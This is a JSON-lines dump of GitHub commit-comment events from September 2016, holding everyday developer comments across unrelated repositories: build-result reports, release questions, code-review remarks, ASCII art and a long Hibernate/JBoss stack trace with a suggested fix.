{"id":"4641902531","type":"CommitCommentEvent","actor":{"login":"mkordas"},"repo":{"name":"DanielThomas/gradle-checkstyle-failure"},"payload":{"comment":{"id":19237344,"position":6,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"68659bb5a83bce701bd1e5aed88cd11e8437a432","created_at":"2016-09-30T07:33:24Z","updated_at":"2016-09-30T07:33:24Z","body":"@DanielThomas can you confirm that issue still exists with Gradle 3.1?"}},"created_at":"2016-09-30T07:33:24Z"}
{"id":"4641903090","type":"CommitCommentEvent","actor":{"login":"dontcallmedom"},"repo":{"name":"w3c/vr-workshop"},"payload":{"comment":{"id":19237346,"position":103,"line":103,"path":"participants.html","commit_id":"e3da4fed2534180bfde9916b3824fa944861ac44","created_at":"2016-09-30T07:33:32Z","updated_at":"2016-09-30T07:33:32Z","body":"HTC have indicated they wanted to be at the workshop, but they still haven't volunteered a name; I'll ping them again."}},"created_at":"2016-09-30T07:33:32Z"}
{"id":"4641908208","type":"CommitCommentEvent","actor":{"login":"wenerme"},"repo":{"name":"bytedeco/javacpp-presets"},"payload":{"comment":{"id":19237358,"position":null,"line":null,"path":null,"commit_id":"922299a4dbdd148c5b8f142209afab84b811a991","created_at":"2016-09-30T07:34:56Z","updated_at":"2016-09-30T07:34:56Z","body":"When this will get released ?"}},"created_at":"2016-09-30T07:34:56Z"}
{"id":"4641910266","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19237366,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T07:35:27Z","updated_at":"2016-09-30T07:35:27Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1857 of 2401 tests passed, 22 test warnings)\n\n * 509 tests had: AUD diffs.\n * 493 tests had: EIO diffs.\n * 471 tests had: Table big diffs.\n * 211 tests had: RDD diffs.\n * 136 tests had: ERR diffs.\n * 369 tests had: MTD diffs.\n * 272 tests had: DXF diffs.\n * 391 tests had: SHD diffs.\n * 407 tests had: BND diffs.\n * 296 tests had: MDD diffs.\n * 185 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 1 test had: MDD di...\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SHD diffs....\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.34%25-red.svg)</a> \n"}},"created_at":"2016-09-30T07:35:27Z"}
{"id":"4641914434","type":"CommitCommentEvent","actor":{"login":"tigerspring"},"repo":{"name":"tigerspring/https---github.com-tigerspring-bsdlabel"},"payload":{"comment":{"id":19237376,"position":null,"line":null,"path":null,"commit_id":"bc5fc1f8bc68896b612a79a2a023378810fa231b","created_at":"2016-09-30T07:36:38Z","updated_at":"2016-09-30T07:36:38Z","body":"没有用处"}},"created_at":"2016-09-30T07:36:38Z"}
{"id":"4641917668","type":"CommitCommentEvent","actor":{"login":"blinoff82"},"repo":{"name":"BrokenROM/external_stagefright-plugins"},"payload":{"comment":{"id":19237381,"position":null,"line":null,"path":null,"commit_id":"40998aa023a37f1dc7d20c8963c294af4f09353b","created_at":"2016-09-30T07:37:30Z","updated_at":"2016-09-30T07:37:30Z","body":"Guys, please revert this commit. Otherwise, it impossible to play video-files with ac3 codecs. I mean stock Gallery. Thx."}},"created_at":"2016-09-30T07:37:30Z"}
{"id":"4641920985","type":"CommitCommentEvent","actor":{"login":"jzp820927"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19237390,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-30T07:38:27Z","updated_at":"2016-09-30T07:38:27Z","body":"我们要慢慢学会适应这样的生活。"}},"created_at":"2016-09-30T07:38:27Z"}
{"id":"4641923101","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19237397,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T07:39:05Z","updated_at":"2016-09-30T07:39:05Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-30T07:39:05Z"}
{"id":"4641924030","type":"CommitCommentEvent","actor":{"login":"BigWavelet"},"repo":{"name":"openatx/go-stf"},"payload":{"comment":{"id":19237400,"position":173,"line":173,"path":"rotation.go","commit_id":"63e418f3af214373f1eb7a364664a39e84b6b18c","created_at":"2016-09-30T07:39:21Z","updated_at":"2016-09-30T07:39:21Z","body":"这里的name参数没用？"}},"created_at":"2016-09-30T07:39:21Z"}
{"id":"4641924048","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19237401,"position":44,"line":521,"path":"js/multichoice.js","commit_id":"bb091c0efe1d65772387e9a35ff56b8e1efa9a26","created_at":"2016-09-30T07:39:21Z","updated_at":"2016-09-30T07:39:21Z","body":"```\r\n      .----.__\r\n     / c  ^  _`;\r\n     |     .--'\r\n      \\   (\r\n      /  -.\\\r\n     / .   \\\r\n    /  \\    |\r\n   ;    `-. `.\r\n   |      /`'.`.\r\n   |      |   \\ \\\r\n   |    __|    `'\r\n   ;   /   \\\r\n  ,'        |\r\n (_`'---._ /--,\r\n   `'---._`'---..__\r\n jgs      `''''--, )\r\n            _.-'`,`\r\n             ````\r\n```"}},"created_at":"2016-09-30T07:39:21Z"}
{"id":"4641925435","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19237404,"position":null,"line":null,"path":null,"commit_id":"c09a51f7a47d9a695d23aafde70eeb818d2f2173","created_at":"2016-09-30T07:39:46Z","updated_at":"2016-09-30T07:39:46Z","body":"We could make them configurable but there is also a delay when importing jobs so the scheduling might not be very accurate either way. Probably good enough for the first version.\r\n\r\nOne thing I'm considering is to not keep all jobs in memory, but we could do that change later too.\r\n\r\nYou need to implement some kind of recovery. Right now the delayed jobs will just sit in the list if you restart the app."}},"created_at":"2016-09-30T07:39:46Z"}
{"id":"4641926002","type":"CommitCommentEvent","actor":{"login":"JordanShackelford"},"repo":{"name":"JordanShackelford/Vidya-Game"},"payload":{"comment":{"id":19237408,"position":170,"line":170,"path":"JordanRPG.js","commit_id":"a444017efe5267f57a677b35c12d40b6f614b68c","created_at":"2016-09-30T07:39:56Z","updated_at":"2016-09-30T07:39:56Z","body":"Got rid of ugly switch statement, now storing xClip and yClip data in array to be more compact and legible. \r\n\r\nEach element of the array corresponds to the xClip and YClip of that frame of the tilesheet. So, for example, for the 0th frame, we see in the animationClips array that the xClip and yClip would be 8 and 7, respectively. When drawing that frame, an image will be cropped from the tilesheet (one big image with all the animation frames) with the top-left corner being (8,7) and the bottom-right corner being (8,7) + (width,height), in this case (32,64). So the bottom-right corner would be the pixel (40,71)."}},"created_at":"2016-09-30T07:39:56Z"}
{"id":"4641929455","type":"CommitCommentEvent","actor":{"login":"raboof"},"repo":{"name":"raboof/connbeat"},"payload":{"comment":{"id":19237420,"position":5,"line":6,"path":"tcp_diag/tcp_diag_cgo.go","commit_id":"a4c34e9458d48d2d8abdbc488e50ab8b3ed5a61f","created_at":"2016-09-30T07:40:55Z","updated_at":"2016-09-30T07:40:55Z","body":"This indeed links libmnl statically, but ideally I think we'd want to link *everything* statically. The ldflags at https://github.com/raboof/connbeat/commit/dced20c94ee4f7fac47b783049e0453ccdf9b925 should do that - agreed?"}},"created_at":"2016-09-30T07:40:55Z"}
{"id":"4641929659","type":"CommitCommentEvent","actor":{"login":"maximehamm"},"repo":{"name":"jspresso/jspresso-ce"},"payload":{"comment":{"id":19237421,"position":null,"line":null,"path":null,"commit_id":"b065cb32af8ccd25a97ff84f296c64f00e193fce","created_at":"2016-09-30T07:40:59Z","updated_at":"2016-09-30T07:40:59Z","body":"Not yet fixed !\r\n\r\nI think you should replace line 611 to 613 by :\r\n```\r\nif (refinedException instanceof HibernateException) {\r\n   refinedException = SessionFactoryUtils.convertHibernateAccessException((HibernateException) refinedException);\r\n }\r\n```\r\n\r\nHere si the stack trace :\r\n\r\nHere is the causes stack :\r\n```\r\norg.springframework.transaction.UnexpectedRollbackException: JTA transaction unexpectedly rolled back (maybe due to a timeout); \r\n\r\njavax.transaction.RollbackException: [com.arjuna.ats.internal.jta.transaction.arjunacore.commitwhenaborted] [com.arjuna.ats.internal.jta.transaction.arjunacore.commitwhenaborted] Could not commit transaction.\r\n\r\norg.hibernate.exception.ConstraintViolationException: could not execute statement com.mysql.jdbc.exceptions.jdbc4.MySQLIntegrityConstraintViolationException: Duplicate entry 'TEST1-19CB1D56-2A03-7017-2674-368883FF47BB' for key 'SUBSIDIARY_REFXNO_UNQ' SUBSIDIARY_REFXNO_UNQ could not execute statement n/a\r\n\r\ncom.mysql.jdbc.exceptions.jdbc4.MySQLIntegrityConstraintViolationException: Duplicate entry 'TEST1-19CB1D56-2A03-7017-2674-368883FF47BB' for key 'SUBSIDIARY_REFXNO_UNQ'_\r\n\r\n```\r\n\r\nHere is the stack trace : \r\n```\r\n09:30:20,105 ERROR [SqlExceptionHelper] Duplicate entry 'TEST1-19CB1D56-2A03-7017-2674-368883FF47BB' for key 'SUBSIDIARY_REFXNO_UNQ'\r\n09:30:20,105 ERROR [SynchronizationCallbackCoordinatorNonTrackingImpl] HHH000346: Error during managed flush [could not execute statement]\r\n09:30:20,113 ERROR [AbstractBatchImpl] HHH000352: Unable to release batch statement...\r\n09:30:20,113 ERROR [AbstractBatchImpl] HHH000246: SQLException escaped proxy\r\njava.sql.SQLException: Connection is not associated with a managed connection.org.jboss.resource.adapter.jdbc.jdk6.WrappedConnectionJDK6@71488f70\r\n\tat org.jboss.resource.adapter.jdbc.WrappedConnection.lock(WrappedConnection.java:97)\r\n\tat org.jboss.resource.adapter.jdbc.WrappedStatement.lock(WrappedStatement.java:68)\r\n\tat org.jboss.resource.adapter.jdbc.WrappedStatement.clearBatch(WrappedStatement.java:751)\r\n\tat org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl.releaseStatements(AbstractBatchImpl.java:171)\r\n\tat org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl.release(AbstractBatchImpl.java:205)\r\n\tat org.hibernate.engine.jdbc.internal.JdbcCoordinatorImpl.close(JdbcCoordinatorImpl.java:183)\r\n\tat org.hibernate.engine.transaction.internal.TransactionCoordinatorImpl.close(TransactionCoordinatorImpl.java:292)\r\n\tat org.hibernate.internal.SessionImpl.close(SessionImpl.java:354)\r\n\tat org.hibernate.internal.SessionImpl.managedClose(SessionImpl.java:422)\r\n\tat org.hibernate.engine.transaction.synchronization.internal.SynchronizationCallbackCoordinatorNonTrackingImpl.doAfterCompletion(SynchronizationCallbackCoordinatorNonTrackingImpl.java:138)\r\n\tat org.hibernate.engine.transaction.synchronization.internal.SynchronizationCallbackCoordinatorTrackingImpl.afterCompletion(SynchronizationCallbackCoordinatorTrackingImpl.java:88)\r\n\tat org.hibernate.engine.transaction.synchronization.internal.RegisteredSynchronization.afterCompletion(RegisteredSynchronization.java:61)\r\n\tat com.arjuna.ats.internal.jta.resources.arjunacore.SynchronizationImple.afterCompletion(SynchronizationImple.java:126)\r\n\tat com.arjuna.ats.arjuna.coordinator.TwoPhaseCoordinator.afterCompletion(TwoPhaseCoordinator.java:389)\r\n\tat com.arjuna.ats.arjuna.coordinator.TwoPhaseCoordinator.end(TwoPhaseCoordinator.java:99)\r\n\tat com.arjuna.ats.arjuna.AtomicAction.commit(AtomicAction.java:160)\r\n\tat com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple.commitAndDisassociate(TransactionImple.java:1433)\r\n\tat com.arjuna.ats.internal.jta.transaction.arjunacore.BaseTransaction.commit(BaseTransaction.java:137)\r\n\tat com.arjuna.ats.jbossatx.BaseTransactionManagerDelegate.commit(BaseTransactionManagerDelegate.java:75)\r\n\tat org.jboss.tm.usertx.client.ServerVMClientUserTransaction.commit(ServerVMClientUserTransaction.java:162)\r\n\tat org.springframework.transaction.jta.JtaTransactionManager.doCommit(JtaTransactionManager.java:1012)\r\n\tat org.springframework.transaction.support.AbstractPlatformTransactionManager.processCommit(AbstractPlatformTransactionManager.java:755)\r\n\tat org.springframework.transaction.support.AbstractPlatformTransactionManager.commit(AbstractPlatformTransactionManager.java:724)\r\n\tat org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:148)\r\n\tat org.jspresso.framework.application.backend.ControllerAwareTransactionTemplate.execute(ControllerAwareTransactionTemplate.java:82)\r\n\tat org.jspresso.framework.application.backend.action.persistence.SaveAction.execute(SaveAction.java:60)\r\n\tat org.jspresso.framework.application.backend.AbstractBackendController.execute(AbstractBackendController.java:402)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.executeBackend(AbstractFrontendController.java:1573)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.execute(AbstractFrontendController.java:592)\r\n\tat org.jspresso.framework.application.action.AbstractAction.execute(AbstractAction.java:114)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.executeFrontend(AbstractFrontendController.java:1586)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.execute(AbstractFrontendController.java:594)\r\n\tat org.jspresso.framework.view.remote.RemoteActionFactory$ActionAdapter.actionPerformed(RemoteActionFactory.java:352)\r\n\tat org.jspresso.framework.application.frontend.controller.remote.AbstractRemoteController.handleCommand(AbstractRemoteController.java:467)\r\n\tat org.jspresso.framework.application.frontend.controller.remote.AbstractRemoteController.handleCommands(AbstractRemoteController.java:206)\r\n\tat org.jspresso.framework.application.startup.remote.RemoteStartup.handleCommands(RemoteStartup.java:89)\r\n\tat sun.reflect.GeneratedMethodAccessor637.invoke(Unknown Source)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat flex.messaging.services.remoting.adapters.JavaAdapter.invoke(JavaAdapter.java:418)\r\n\tat flex.messaging.services.RemotingService.serviceMessage(RemotingService.java:183)\r\n\tat flex.messaging.MessageBroker.routeMessageToService(MessageBroker.java:1400)\r\n\tat flex.messaging.endpoints.AbstractEndpoint.serviceMessage(AbstractEndpoint.java:1005)\r\n\tat flex.messaging.endpoints.amf.MessageBrokerFilter.invoke(MessageBrokerFilter.java:103)\r\n\tat flex.messaging.endpoints.amf.LegacyFilter.invoke(LegacyFilter.java:158)\r\n\tat flex.messaging.endpoints.amf.SessionFilter.invoke(SessionFilter.java:44)\r\n\tat flex.messaging.endpoints.amf.BatchProcessFilter.invoke(BatchProcessFilter.java:67)\r\n\tat flex.messaging.endpoints.amf.SerializationFilter.invoke(SerializationFilter.java:166)\r\n\tat flex.messaging.endpoints.BaseHTTPEndpoint.service(BaseHTTPEndpoint.java:291)\r\n\tat flex.messaging.MessageBrokerServlet.service(MessageBrokerServlet.java:353)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:717)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.jspresso.framework.util.http.HttpRequestHolder.doFilter(HttpRequestHolder.java:99)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)\r\n\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)\r\n\tat org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:183)\r\n\tat org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:95)\r\n\tat org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)\r\n\tat org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)\r\n\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)\r\n\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)\r\n\tat org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)\r\n\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)\r\n\tat org.jboss.web.tomcat.service.request.ActiveRequestResponseCacheValve.internalProcess(ActiveRequestResponseCacheValve.java:74)\r\n\tat org.jboss.web.tomcat.service.request.ActiveRequestResponseCacheValve.invoke(ActiveRequestResponseCacheValve.java:47)\r\n\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)\r\n\tat org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)\r\n\tat org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:599)\r\n\tat org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:451)\r\n\tat java.lang.Thread.run(Thread.java:745)\r\n09:36:12,468 ERROR [AbstractFrontendController] An unexpected error occurred for user e242484 on session 28634967.\r\norg.hibernate.exception.ConstraintViolationException: could not execute statement\r\n\tat org.hibernate.exception.internal.SQLExceptionTypeDelegate.convert(SQLExceptionTypeDelegate.java:74)\r\n\tat org.hibernate.exception.internal.StandardSQLExceptionConverter.convert(StandardSQLExceptionConverter.java:49)\r\n\tat org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:124)\r\n\tat org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:109)\r\n\tat org.hibernate.engine.jdbc.internal.ResultSetReturnImpl.executeUpdate(ResultSetReturnImpl.java:189)\r\n\tat org.hibernate.engine.jdbc.batch.internal.NonBatchingBatch.addToBatch(NonBatchingBatch.java:58)\r\n\tat org.hibernate.persister.entity.AbstractEntityPersister.insert(AbstractEntityPersister.java:3079)\r\n\tat org.hibernate.persister.entity.AbstractEntityPersister.insert(AbstractEntityPersister.java:3515)\r\n\tat org.hibernate.action.internal.EntityInsertAction.execute(EntityInsertAction.java:88)\r\n\tat org.hibernate.engine.spi.ActionQueue.execute(ActionQueue.java:395)\r\n\tat org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:387)\r\n\tat org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:303)\r\n\tat org.hibernate.event.internal.AbstractFlushingEventListener.performExecutions(AbstractFlushingEventListener.java:349)\r\n\tat org.hibernate.event.internal.DefaultFlushEventListener.onFlush(DefaultFlushEventListener.java:56)\r\n\tat org.hibernate.internal.SessionImpl.flush(SessionImpl.java:1159)\r\n\tat org.hibernate.internal.SessionImpl.managedFlush(SessionImpl.java:404)\r\n\tat org.hibernate.engine.transaction.synchronization.internal.SynchronizationCallbackCoordinatorNonTrackingImpl.beforeCompletion(SynchronizationCallbackCoordinatorNonTrackingImpl.java:105)\r\n\tat org.hibernate.engine.transaction.synchronization.internal.RegisteredSynchronization.beforeCompletion(RegisteredSynchronization.java:53)\r\n\tat com.arjuna.ats.internal.jta.resources.arjunacore.SynchronizationImple.beforeCompletion(SynchronizationImple.java:101)\r\n\tat com.arjuna.ats.arjuna.coordinator.TwoPhaseCoordinator.beforeCompletion(TwoPhaseCoordinator.java:272)\r\n\tat com.arjuna.ats.arjuna.coordinator.TwoPhaseCoordinator.end(TwoPhaseCoordinator.java:89)\r\n\tat com.arjuna.ats.arjuna.AtomicAction.commit(AtomicAction.java:160)\r\n\tat com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple.commitAndDisassociate(TransactionImple.java:1433)\r\n\tat com.arjuna.ats.internal.jta.transaction.arjunacore.BaseTransaction.commit(BaseTransaction.java:137)\r\n\tat com.arjuna.ats.jbossatx.BaseTransactionManagerDelegate.commit(BaseTransactionManagerDelegate.java:75)\r\n\tat org.jboss.tm.usertx.client.ServerVMClientUserTransaction.commit(ServerVMClientUserTransaction.java:162)\r\n\tat org.springframework.transaction.jta.JtaTransactionManager.doCommit(JtaTransactionManager.java:1012)\r\n\tat org.springframework.transaction.support.AbstractPlatformTransactionManager.processCommit(AbstractPlatformTransactionManager.java:755)\r\n\tat org.springframework.transaction.support.AbstractPlatformTransactionManager.commit(AbstractPlatformTransactionManager.java:724)\r\n\tat org.springframework.transaction.support.TransactionTemplate.execute(TransactionTemplate.java:148)\r\n\tat org.jspresso.framework.application.backend.ControllerAwareTransactionTemplate.execute(ControllerAwareTransactionTemplate.java:82)\r\n\tat org.jspresso.framework.application.backend.action.persistence.SaveAction.execute(SaveAction.java:60)\r\n\tat org.jspresso.framework.application.backend.AbstractBackendController.execute(AbstractBackendController.java:402)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.executeBackend(AbstractFrontendController.java:1573)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.execute(AbstractFrontendController.java:592)\r\n\tat org.jspresso.framework.application.action.AbstractAction.execute(AbstractAction.java:114)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.executeFrontend(AbstractFrontendController.java:1586)\r\n\tat org.jspresso.framework.application.frontend.controller.AbstractFrontendController.execute(AbstractFrontendController.java:594)\r\n\tat org.jspresso.framework.view.remote.RemoteActionFactory$ActionAdapter.actionPerformed(RemoteActionFactory.java:352)\r\n\tat org.jspresso.framework.application.frontend.controller.remote.AbstractRemoteController.handleCommand(AbstractRemoteController.java:467)\r\n\tat org.jspresso.framework.application.frontend.controller.remote.AbstractRemoteController.handleCommands(AbstractRemoteController.java:206)\r\n\tat org.jspresso.framework.application.startup.remote.RemoteStartup.handleCommands(RemoteStartup.java:89)\r\n\tat sun.reflect.GeneratedMethodAccessor637.invoke(Unknown Source)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat flex.messaging.services.remoting.adapters.JavaAdapter.invoke(JavaAdapter.java:418)\r\n\tat flex.messaging.services.RemotingService.serviceMessage(RemotingService.java:183)\r\n\tat flex.messaging.MessageBroker.routeMessageToService(MessageBroker.java:1400)\r\n\tat flex.messaging.endpoints.AbstractEndpoint.serviceMessage(AbstractEndpoint.java:1005)\r\n\tat flex.messaging.endpoints.amf.MessageBrokerFilter.invoke(MessageBrokerFilter.java:103)\r\n\tat flex.messaging.endpoints.amf.LegacyFilter.invoke(LegacyFilter.java:158)\r\n\tat flex.messaging.endpoints.amf.SessionFilter.invoke(SessionFilter.java:44)\r\n\tat flex.messaging.endpoints.amf.BatchProcessFilter.invoke(BatchProcessFilter.java:67)\r\n\tat flex.messaging.endpoints.amf.SerializationFilter.invoke(SerializationFilter.java:166)\r\n\tat flex.messaging.endpoints.BaseHTTPEndpoint.service(BaseHTTPEndpoint.java:291)\r\n\tat flex.messaging.MessageBrokerServlet.service(MessageBrokerServlet.java:353)\r\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:717)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.jspresso.framework.util.http.HttpRequestHolder.doFilter(HttpRequestHolder.java:99)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)\r\n\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)\r\n\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)\r\n\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)\r\n\tat org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:183)\r\n\tat org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:95)\r\n\tat org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)\r\n\tat org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)\r\n\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)\r\n\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)\r\n\tat org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)\r\n\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)\r\n\tat org.jboss.web.tomcat.service.request.ActiveRequestResponseCacheValve.internalProcess(ActiveRequestResponseCacheValve.java:74)\r\n\tat org.jboss.web.tomcat.service.request.ActiveRequestResponseCacheValve.invoke(ActiveRequestResponseCacheValve.java:47)\r\n\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)\r\n\tat org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)\r\n\tat org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:599)\r\n\tat org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:451)\r\n\tat java.lang.Thread.run(Thread.java:745)\r\nCaused by: com.mysql.jdbc.exceptions.jdbc4.MySQLIntegrityConstraintViolationException: Duplicate entry 'TEST1-19CB1D56-2A03-7017-2674-368883FF47BB' for key 'SUBSIDIARY_REFXNO_UNQ'\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\r\n\tat java.lang.reflect.Constructor.newInstance(Constructor.java:408)\r\n\tat com.mysql.jdbc.Util.handleNewInstance(Util.java:411)\r\n\tat com.mysql.jdbc.Util.getInstance(Util.java:386)\r\n\tat com.mysql.jdbc.SQLError.createSQLException(SQLError.java:1040)\r\n\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:4074)\r\n\tat com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:4006)\r\n\tat com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2468)\r\n\tat com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2629)\r\n\tat com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2719)\r\n\tat com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:2155)\r\n\tat com.mysql.jdbc.PreparedStatement.executeUpdate(PreparedStatement.java:2450)\r\n\tat com.mysql.jdbc.PreparedStatement.executeUpdate(PreparedStatement.java:2371)\r\n\tat com.mysql.jdbc.PreparedStatement.executeUpdate(PreparedStatement.java:2355)\r\n\tat com.mysql.jdbc.jdbc2.optional.PreparedStatementWrapper.executeUpdate(PreparedStatementWrapper.java:875)\r\n\tat org.jboss.resource.adapter.jdbc.WrappedPreparedStatement.executeUpdate(WrappedPreparedStatement.java:365)\r\n\tat org.hibernate.engine.jdbc.internal.ResultSetReturnImpl.executeUpdate(ResultSetReturnImpl.java:186)\r\n\t... 77 more\r\n```"}},"created_at":"2016-09-30T07:40:59Z"}
{"id":"4641932442","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237426,"position":4,"line":3253,"path":"html/template/default/css/style.css","commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T07:41:37Z","updated_at":"2016-09-30T07:41:37Z","body":"So you should use media tag. Because it will broken layout on the PC. "}},"created_at":"2016-09-30T07:41:37Z"}
